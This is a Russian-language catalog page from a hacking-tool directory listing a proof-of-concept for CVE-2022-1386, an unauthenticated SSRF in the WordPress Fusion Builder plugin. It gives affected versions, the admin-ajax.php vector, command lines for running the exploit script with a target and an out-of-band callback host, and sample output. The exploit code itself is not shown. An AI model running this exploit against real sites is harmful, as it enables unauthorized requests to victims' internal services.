Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-1386-FusionBuilder-SSRF — PoC неаутентифицированного SSRF в WordPress Fusion Builder <3.6.2 (CVE-2022-1386) | Kitploit
Инструменты/GitHubGitHub/fayassgit/cve-2022-1386-fusionbuilder-ssrf
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubfayassgit/cve-2022-1386-fusionbuilder-ssrf

CVE-2022-1386-FusionBuilder-SSRF

PoC неаутентифицированного SSRF в WordPress Fusion Builder <3.6.2 (CVE-2022-1386)

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
21 год назадЕщё не проверено

CVE-2022-1386 – Fusion Builder < 3.6.2 - Неаутентифицированный SSRF

💥 Описание

Неаутентифицированная Server-Side Request Forgery (SSRF) в плагине Fusion Builder (используется темой Avada для WordPress) до версии 3.6.2.
Позволяет атакующим отправлять HTTP-запросы на произвольные URL-адреса, потенциально нацеливаясь на внутренние сервисы.

🛡 Затронутый продукт

  • Fusion Builder < 3.6.2
  • Установки темы Avada, использующие уязвимый плагин Fusion Builder

🔍 Детали CVE

  • CVE: CVE-2022-1386
  • Серьёзность: Критическая
  • Вектор: Неаутентифицированный HTTP POST к admin-ajax.php

🧪 Использование PoC

root@kitploit:~
python3 exploit_cve_2022_1386.py <target_url> <your_callback_url>

Пример:

root@kitploit:~
python3 exploit_cve_2022_1386.py https://vulnerable.site https://abc123.oast.fun

Используйте Interact.sh или [Burp Collaborator] для получения callback.

📋 Пример вывода

root@kitploit:~
[*] Fetching nonce from target...
[*] Sending SSRF payload to https://abc123.oast.fun...
[+] SSRF confirmed: received callback from victim server.

📌 Примечания Данный PoC не занимается эксфильтрацией данных. Только этическое использование: не эксплуатируйте системы без авторизации.

📚 Ссылки https://wpscan.com/vulnerability/bf7034ab-24c4-461f-a709-3f73988b536b https://theme-fusion.com/documentation/avada/fusion-builder-changelog/

Скачать инструмент